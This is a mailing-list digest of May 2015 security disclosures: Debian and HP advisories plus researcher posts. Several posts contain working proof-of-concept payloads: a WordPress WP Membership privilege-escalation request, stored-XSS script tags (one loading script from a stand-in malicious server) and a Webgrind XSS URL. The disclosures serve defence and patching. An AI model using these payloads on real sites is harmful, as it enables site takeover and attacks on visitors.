Christoph Berg | 22 May 17:18 2015

[SECURITY] [DSA 3270-1] postgresql-9.4 security update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3270-1                   security <at> debian.org
http://www.debian.org/security/                            Christoph Berg
May 22, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : postgresql-9.4
CVE ID         : CVE-2015-3165 CVE-2015-3166 CVE-2015-3167

Several vulnerabilities have been found in PostgreSQL-9.4, a SQL
database system.

CVE-2015-3165 (Remote crash)

    SSL clients disconnecting just before the authentication timeout
    expires can cause the server to crash.

CVE-2015-3166 (Information exposure)

    The replacement implementation of snprintf() failed to check for
    errors reported by the underlying system library calls; the main
    case that might be missed is out-of-memory situations. In the worst
    case this might lead to information exposure.

CVE-2015-3167 (Possible side-channel key exposure)

    In contrib/pgcrypto, some cases of decryption with an incorrect key
    could report other error message texts. Fix by using a
    one-size-fits-all message.

Salvatore Bonaccorso | 22 May 07:57 2015

[SECURITY] [DSA 3268-1] ntfs-3g security update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3268-1                   security <at> debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
May 22, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : ntfs-3g
CVE ID         : CVE-2015-3202
Debian Bug     : 786475

Tavis Ormandy discovered that NTFS-3G, a read-write NTFS driver for
FUSE, does not scrub the environment before executing mount or umount
with elevated privileges. A local user can take advantage of this flaw
to overwrite arbitrary files and gain elevated privileges by accessing
debugging features via the environment that would not normally be safe
for unprivileged users.

For the oldstable distribution (wheezy), this problem has been fixed in
version 1:2012.1.15AR.5-2.1+deb7u1. Note that this issue does not affect
the binary packages distributed in Debian in wheezy as ntfs-3g does not
use the embedded fuse-lite library.

For the stable distribution (jessie), this problem has been fixed in
version 1:2014.2.15AR.2-1+deb8u1.

For the testing distribution (stretch) and the unstable distribution
(sid), this problem will be fixed soon.

We recommend that you upgrade your ntfs-3g packages.

Michael Gilbert | 22 May 07:02 2015

[SECURITY] [DSA 3267-1] chromium-browser security update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3267-1                   security <at> debian.org
http://www.debian.org/security/                           Michael Gilbert
May 22, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : chromium-browser
CVE ID         : CVE-2015-1251 CVE-2015-1252 CVE-2015-1253 CVE-2015-1254
                 CVE-2015-1255 CVE-2015-1256 CVE-2015-1257 CVE-2015-1258
                 CVE-2015-1259 CVE-2015-1260 CVE-2015-1261 CVE-2015-1262
                 CVE-2015-1263 CVE-2015-1264 CVE-2015-1265

Several vulnerabilities were discovered in the chromium web browser.

CVE-2015-1251

    SkyLined discovered a use-after-free issue in speech recognition.

CVE-2015-1252

    An out-of-bounds write issue was discovered that could be used to
    escape from the sandbox.

CVE-2015-1253

    A cross-origin bypass issue was discovered in the DOM parser.

CVE-2015-1254


security-alert | 21 May 22:48 2015

[security bulletin] HPSBMU03336 rev.1- HP Helion OpenStack affected by VENOM, Denial of Service (DoS), Execution of Arbitrary Code


SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04685037
Version: 1

HPSBMU03336 rev.1- HP Helion OpenStack affected by VENOM, Denial of Service
(DoS), Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-05-21
Last Updated: 2015-05-21

Potential Security Impact: Denial of Service (DoS), Execution of Arbitrary
Code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Helion OpenStack.
The vulnerability could be exploited resulting in Denial of Service (DoS) or
execution of arbitrary code.

pan.vagenas | 21 May 22:39 2015

CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]

# Exploit Title: WordPress WP Membership plugin [Privilege escalation]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4038

1 Description

Any registered user can perform a privilege escalation through the `iv_membership_update_user_settings`
AJAX action.
Although this exploit can be used to modify other plugin-related data (e.g. payment status and expiry date),
privilege escalation can lead to a serious incident because the malicious user can take an administrative
role on the infected website.

2 Proof of Concept

* Log in as a regular user
* Send a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`

3 Actions taken after discovery

Vendor was informed on 2015/05/19.

4 Solution

No official solution yet exists.


pan.vagenas | 21 May 22:36 2015

CVE-2015-4039 - WordPress WP Membership plugin [Stored XSS]

# Exploit Title: WordPress WP Membership plugin [Stored XSS]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4039

=============================================
* 1. Stored XSS
=============================================

1.1 Description

All input fields from registered users aren't properly escaped. This could lead to an XSS attack that could
possibly affect all visitors of the website, including administrators.

1.2 Proof of Concept

* Log in as a regular user
* Update any field of your profile appending at the end
	`<script>alert('XSS');</script>` 
	or 
	`<script src=”http://malicious .server/my_malicious_script.js”/>`

1.3 Actions taken after discovery

Vendor was informed on 2015/05/19.

1.4 Solution

Salvatore Bonaccorso | 21 May 19:27 2015

[SECURITY] [DSA 3266-1] fuse security update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3266-1                   security <at> debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
May 21, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : fuse
CVE ID         : CVE-2015-3202

Tavis Ormandy discovered that FUSE, a Filesystem in USErspace, does not
scrub the environment before executing mount or umount with elevated
privileges. A local user can take advantage of this flaw to overwrite
arbitrary files and gain elevated privileges by accessing debugging
features via the environment that would not normally be safe for
unprivileged users.

For the oldstable distribution (wheezy), this problem has been fixed
in version 2.9.0-2+deb7u2.

For the stable distribution (jessie), this problem has been fixed in
version 2.9.3-15+deb8u1.

For the testing distribution (stretch) and the unstable distribution
(sid), this problem will be fixed soon.

We recommend that you upgrade your fuse packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be

hyp3rlinx | 21 May 19:28 2015

Webgrind XSS vulnerability

Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt

Vendor:
https://github.com/jokkedk/webgrind

Product:
Webgrind is a Xdebug Profiling Web Frontend in PHP.

Advisory Information:
=====================================================
Webgrind is vulnerable to cross site scripting attacks.

Exploit code:
==============
http://localhost/webgrind/index.php?op=fileviewer&file=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E

Disclosure Timeline:
==================================

Vendor Notification  May 19, 2015
May 20, 2015: Public Disclosure

Severity Level:
===============
Med


Salvatore Bonaccorso | 20 May 22:25 2015

[SECURITY] [DSA 3261-2] libmodule-signature-perl regression update


-------------------------------------------------------------------------
Debian Security Advisory DSA-3261-2                   security <at> debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
May 20, 2015                           http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : libmodule-signature-perl
Debian Bug     : 785701

The update for libmodule-signature-perl issued as DSA-3261-1 introduced
a regression in the handling of the --skip option of cpansign. Updated
packages are now available to address this regression. For reference,
the original advisory text follows.

Multiple vulnerabilities were discovered in libmodule-signature-perl, a
Perl module to manipulate CPAN SIGNATURE files. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2015-3406

    John Lightsey discovered that Module::Signature could parse the
    unsigned portion of the SIGNATURE file as the signed portion due to
    incorrect handling of PGP signature boundaries.

CVE-2015-3407

    John Lightsey discovered that Module::Signature incorrectly handles
    files that are not listed in the SIGNATURE file. This includes some
    files in the t/ directory that would execute when tests are run.

security-alert | 20 May 17:11 2015

[security bulletin] HPSBUX03333 SSRT102029 rev.1 - HP-UX Running NTP, Remote Denial of Service (DoS), or Other Vulnerabilities


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04679309

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04679309
Version: 1

HPSBUX03333 SSRT102029 rev.1 - HP-UX Running NTP, Remote Denial of Service
(DoS), or Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-05-19
Last Updated: 2015-05-19

Potential Security Impact: Remote Denial of Service (DoS), or other
vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running
NTP. These could be exploited remotely to create a Denial of Service (DoS),
or other vulnerabilities.

References:

security-alert | 20 May 17:11 2015

[security bulletin] HPSBUX03334 SSRT102000 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS) and Other Vulnerabilities


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04679334

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04679334
Version: 1

HPSBUX03334 SSRT102000 rev.1 - HP-UX Running OpenSSL, Remote Denial of
Service (DoS) and Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-05-19
Last Updated: 2015-05-19

Potential Security Impact: Remote Denial of Service (DoS) and other
vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running
OpenSSL. These vulnerabilities could be exploited remotely to create a remote
Denial of Service (DoS) and other vulnerabilities.

References:

